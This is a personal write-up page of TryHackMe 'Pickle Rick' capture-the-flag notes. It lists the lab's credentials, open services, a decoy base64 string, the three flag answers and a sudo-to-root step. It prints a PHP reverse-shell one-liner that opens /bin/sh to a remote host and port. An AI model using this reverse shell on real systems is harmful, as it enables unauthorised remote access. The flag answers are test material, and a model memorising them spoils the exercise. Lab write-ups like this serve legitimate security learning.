🪓
THM
  • Machines
    • Easy Machines
      • Pickle Rick
        • Findings Log
        • Scouting
          • URL Source Code
          • Wappalyzer
          • NMAP
        • Enumeration
          • Initial Enumeration
            • Gobuster
            • Open Port Vulnerability Check
            • Nikto
          • Portal Page Enumeration
        • Exploitation
          • SSH- Pointless
          • Command Panel
            • Python Webserver
            • Payloadallthethings
          • Cookies
        • Escalation
      • Basic Penetration Testing
      • OhSINT
      • Crack the hash
      • RootMe
      • Simple CTF
Powered by GitBook
On this page
  1. Machines
  2. Easy Machines
  3. Pickle Rick

Findings Log

  • Username: "R1ckRul3s"

  • Password: "Wubbalubbadubdub"

  • Ports open:

    • 22 --> OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)

    • 80 --> Apache httpd 2.4.18 ((Ubuntu))

  • Backend uses PHP

  • Login Page: /login.php

  • First Ingredient --> mr. meeseek hair

  • In the /portal.php source code, there is a base64 encrypted comment that doesn't decrypt to anything:

    • Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==

    • I went down the rabbit hole. Seriously. F*** them.

    • This decrypts to rabbit hole if you base64 encrypt it like 10 times. I literally sat there and kept decrypting it wondering if I would get something juicy.

  • From Command Console you can gain RCE with:

php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

  • In /home/rick you can find the second ingredient 1 jerry tear

  • Use sudu su to become root without needing a password.

  • The third ingredient is located in /root/3rd.txt

    • fleeb juice

PreviousPickle RickNextScouting

Last updated 2 years ago